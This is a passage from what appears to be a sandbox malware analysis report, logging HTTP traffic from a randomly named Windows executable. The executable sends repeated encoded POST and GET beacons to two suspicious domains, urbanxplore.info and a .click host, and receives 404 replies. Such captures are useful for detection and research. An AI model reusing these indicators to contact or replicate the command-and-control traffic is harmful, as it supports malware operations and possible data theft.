                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:55.212182999 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.1049991209.74.77.108806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:01.068685055 CET675OUTPOST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 62 4c 55 76 67 54 46 33 6b 37 65 4f 68 4f 43 54 39 36 2b 43 77 6d 75 44 57 2f 69 2f 62 55 51 4f 52 66 45 71 62 54 53 4d 38 54 77 34 33 62 6d 44 78 33 76 6d 39 4a 69 72 34 45 55 76 44 78 52 73 47 48 42 75 79 58 53 66 74 51 42 6b 59 5a 2b 55 33 5a 59 47 41 54 43 52 75 74 76 74 4b 32 56 39 50 75 70 62 5a 43 46 2f 6a 32 69 70 78 68 67 45 63 6d 41 46 50 64 42 77 36 54 53 50 34 58 4c 42 4a 53 53 59 64 77 74 56 38 61 57 41 42 42 6a 52 6c 77 46 49 4d 39 53 5a 37 38 67 52 6a 5a 5a 64 64 52 47 55 6b 4a 41 70 69 4b 2f 4d 4b 65 52 51 34 36 35 54 6e 6a 6c 79 45 53 4e 6f
                                                            Data Ascii: 9HaD=bLUvgTF3k7eOhOCT96+CwmuDW/i/bUQORfEqbTSM8Tw43bmDx3vm9Jir4EUvDxRsGHBuyXSftQBkYZ+U3ZYGATCRutvtK2V9PupbZCF/j2ipxhgEcmAFPdBw6TSP4XLBJSSYdwtV8aWABBjRlwFIM9SZ78gRjZZddRGUkJApiK/MKeRQ465TnjlyESNo
                                                            Nov 24, 2024 08:15:02.331581116 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:02 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.1049992209.74.77.108806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:03.728972912 CET699OUTPOST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 62 4c 55 76 67 54 46 33 6b 37 65 4f 68 75 79 54 34 62 2b 43 32 47 75 41 50 50 69 2f 4e 6b 51 43 52 66 34 71 62 53 47 69 39 67 55 34 33 35 75 44 77 31 48 6d 36 4a 69 72 77 6b 56 6c 65 68 52 6a 47 48 4e 6d 79 53 36 66 74 55 68 6b 59 5a 4f 55 33 71 67 46 42 44 43 66 6c 4e 76 76 48 57 56 39 50 75 70 62 5a 43 51 55 6a 32 4b 70 78 54 30 45 4f 54 67 4b 44 39 42 33 77 7a 53 50 70 48 4c 46 4a 53 53 36 64 79 59 41 38 59 65 41 42 41 54 52 6c 68 45 36 47 39 53 66 31 63 68 38 75 71 30 79 63 67 69 48 71 37 45 52 2f 59 7a 32 4a 2f 73 58 70 72 59 45 30 55 35 38 4b 55 34 43 36 49 52 52 61 35 4d 73 6f 73 63 74 6f 42 6d 47 46 55 43 31 79 41 3d 3d
                                                            Data Ascii: 9HaD=bLUvgTF3k7eOhuyT4b+C2GuAPPi/NkQCRf4qbSGi9gU435uDw1Hm6JirwkVlehRjGHNmyS6ftUhkYZOU3qgFBDCflNvvHWV9PupbZCQUj2KpxT0EOTgKD9B3wzSPpHLFJSS6dyYA8YeABATRlhE6G9Sf1ch8uq0ycgiHq7ER/Yz2J/sXprYE0U58KU4C6IRRa5MsosctoBmGFUC1yA==
                                                            Nov 24, 2024 08:15:05.065916061 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:04 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.1049993209.74.77.108806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:06.389189005 CET1712OUTPOST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 62 4c 55 76 67 54 46 33 6b 37 65 4f 68 75 79 54 34 62 2b 43 32 47 75 41 50 50 69 2f 4e 6b 51 43 52 66 34 71 62 53 47 69 39 67 63 34 33 4c 57 44 78 53 7a 6d 37 4a 69 72 36 45 56 6d 65 68 52 45 47 48 56 69 79 53 32 6c 74 53 74 6b 5a 34 75 55 37 4c 67 46 55 54 43 66 71 74 76 69 4b 32 55 6c 50 75 34 53 5a 43 41 55 6a 32 4b 70 78 54 59 45 4e 47 41 4b 42 39 42 77 36 54 53 54 34 58 4c 39 4a 53 61 51 64 78 30 51 39 6f 2b 41 43 67 44 52 69 54 63 36 62 4e 53 64 34 38 68 6b 75 71 34 74 63 67 2b 31 71 36 67 33 2f 61 6a 32 4b 71 42 31 35 4a 59 31 75 31 42 2b 4a 58 63 6a 39 50 45 34 57 4c 31 61 6c 4e 4d 74 77 41 48 33 47 46 7a 74 68 37 2f 30 42 77 73 6e 35 74 31 38 49 63 36 42 66 50 65 32 66 49 63 6c 78 6c 67 78 54 46 34 77 57 76 4f 77 35 57 79 45 76 57 64 74 62 37 34 4b 79 6a 36 4c 37 53 76 4f 37 68 38 73 75 74 63 64 57 55 30 2b 65 67 56 79 68 77 6e 2f 6e 46 37 43 63 31 37 39 5a 6d 6b 34 68 6d 72 42 4c 56 77 62 4c 52 75 48 2f 4e 41 74 55 41 6c 5a 44 5a 70 4d 63 62 48 43 4b 46 58 42 65 77 32 52 31 [TRUNCATED]
                                                            Data Ascii: 9HaD=bLUvgTF3k7eOhuyT4b+C2GuAPPi/NkQCRf4qbSGi9gc43LWDxSzm7Jir6EVmehREGHViyS2ltStkZ4uU7LgFUTCfqtviK2UlPu4SZCAUj2KpxTYENGAKB9Bw6TST4XL9JSaQdx0Q9o+ACgDRiTc6bNSd48hkuq4tcg+1q6g3/aj2KqB15JY1u1B+JXcj9PE4WL1alNMtwAH3GFzth7/0Bwsn5t18Ic6BfPe2fIclxlgxTF4wWvOw5WyEvWdtb74Kyj6L7SvO7h8sutcdWU0+egVyhwn/nF7Cc179Zmk4hmrBLVwbLRuH/NAtUAlZDZpMcbHCKFXBew2R1kJ8x+ILTDgWUh4SNeMfmtV6pj7EkYukMVLLgBbS2gzzwmSPtshWKgL1SPwW+ew5rEBoddc5uvgF1UYBlpJR2qzl8kYfzvlCI8kvhv1oURkwtYpWjIrImwT4nGGt+/s6n6JNRdrSwLKNIBFTg1F57Fwzr+wybg7QcD5wChEcWw2Ri+A6zvVSTAjt15kPAkXo4SxChUbNs4YoDGc8uYTmX9qHTIkEDU7rYm2Rrj/TiGdM12/FwWDT4Bx1hjYiVBRsP5tKOpcmwm2oh0efkH+MKvYpi+VnI2FBEpGgvRw7VxSHggVD0hVxFRNNL9tONndDcNx7k90zLU15NhK3ht2/rspbYC+KchZ3XJ29A247pGr5RBTW+grX6D6kAiI3ZQTfE7dL8LGpNQ2ucz4GQVNvIWrF1KdiJjJcB3D9zbxe/rGcsMSZn6khpuF8SD5zUUBQzTF9bG8CB/NjsLp06tPk/twOqJRpGDRlzPUJTHAxzcPaAHE3FAo4MJ+n9IFfREMfQV6Ec6IhzFBPNHEMZ97PIuEnoylTapGk3ozoQTvxck9Op7raTjp9s++AqihP5m9QOl2dIiTaXqS5G+tbByotQobPE4QEnNcsscI4HbfsUfx/VhBvfIUqy7T2a/e06ouV8m7A9qBkFkHDetoOOiKz82YvuIq3KwFprEQ [TRUNCATED]
                                                            Nov 24, 2024 08:15:07.607530117 CET533INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:07 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.1049994209.74.77.108806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:09.061122894 CET404OUTGET /chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:10.272936106 CET548INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:10 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.1049995104.21.44.16806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:15.848953962 CET690OUTPOST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 7a 32 6e 38 35 62 71 47 52 71 48 30 75 4b 2b 52 38 69 69 66 34 6e 4e 34 65 44 33 4b 56 57 70 79 43 70 77 63 51 4b 63 33 42 6b 34 55 75 52 38 4a 37 57 6a 49 34 35 6f 52 4f 71 2f 6e 66 58 35 4e 55 51 74 61 47 45 73 42 47 65 4a 39 48 42 46 76 48 2b 59 74 64 52 43 4b 31 49 65 6b 70 63 64 74 68 49 57 79 6c 34 70 61 36 62 34 6f 7a 53 5a 2b 59 51 35 75 34 78 55 42 51 6a 74 36 77 2b 47 6d 5a 74 33 61 79 32 2b 41 45 33 4c 6f 4a 45 38 57 6e 2f 32 4f 43 7a 4c 78 52 48 68 42 31 66 49 5a 47 39 63 44 77 69 44 4e 58 53 54 78 34 46 66 57
                                                            Data Ascii: 9HaD=DTC41ACwd8+kz2n85bqGRqH0uK+R8iif4nN4eD3KVWpyCpwcQKc3Bk4UuR8J7WjI45oROq/nfX5NUQtaGEsBGeJ9HBFvH+YtdRCK1IekpcdthIWyl4pa6b4ozSZ+YQ5u4xUBQjt6w+GmZt3ay2+AE3LoJE8Wn/2OCzLxRHhB1fIZG9cDwiDNXSTx4FfW
                                                            Nov 24, 2024 08:15:16.991203070 CET899INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:16 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56iRVz82rYHHYtPbfv%2FJ1bfWXhYdXV4SfXyvSQDenMWt5waNgekkwIeY9WEA8C4%2BIXINiuyNmTncsLK6M7b2DkloPDvWN09mejHPX7zICGnL5uwYnuD9c8mvW%2Fb99gBnKv7Gr%2BwrLnaLkoDn"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b5e0bc48c72-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.1049996104.21.44.16806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:15:18.515841961 CET714OUTPOST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 78 58 58 38 31 63 65 47 46 36 48 37 69 71 2b 52 31 43 69 62 34 6e 42 34 65 48 4f 53 55 6b 4e 79 43 4a 41 63 43 62 63 33 47 6b 34 55 33 68 38 32 31 32 69 4b 34 35 73 7a 4f 72 44 6e 66 58 46 4e 55 52 64 61 47 54 41 43 48 4f 4a 37 53 52 46 74 59 75 59 74 64 52 43 4b 31 49 4c 42 70 63 46 74 68 35 6d 79 6b 5a 70 5a 35 62 34 72 30 53 5a 2b 63 51 35 69 34 78 55 7a 51 69 77 66 77 38 75 6d 5a 6f 54 61 79 6a 53 44 4b 33 4c 79 4e 45 39 43 30 2b 65 48 4d 6d 6e 66 65 45 4a 67 6f 5a 73 50 49 38 68 45 68 7a 69 61 45 6c 50 2f 32 44 71 38 36 52 57 43 75 42 73 34 66 4c 6c 54 63 4d 4d 62 4c 47 31 49 4e 51 3d 3d
                                                            Data Ascii: 9HaD=DTC41ACwd8+kxXX81ceGF6H7iq+R1Cib4nB4eHOSUkNyCJAcCbc3Gk4U3h8212iK45szOrDnfXFNURdaGTACHOJ7SRFtYuYtdRCK1ILBpcFth5mykZpZ5b4r0SZ+cQ5i4xUzQiwfw8umZoTayjSDK3LyNE9C0+eHMmnfeEJgoZsPI8hEhziaElP/2Dq86RWCuBs4fLlTcMMbLG1INQ==
                                                            Nov 24, 2024 08:15:19.655185938 CET897INHTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:19 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FmxdIQ3pf%2Bq5HA%2BoI9X3Qd3lvwSWkusOaGqom8JdMb5mwbpWnNtPVoo8VwzzX8u5i5LeE8PFEfun6Fx9gZEkbn7P%2Bnca9oGo94MooRAvj7gRmwcBiFMog3J5oUNuegDseD34ndOQSKDXVz0"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b6ebe935e7d-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
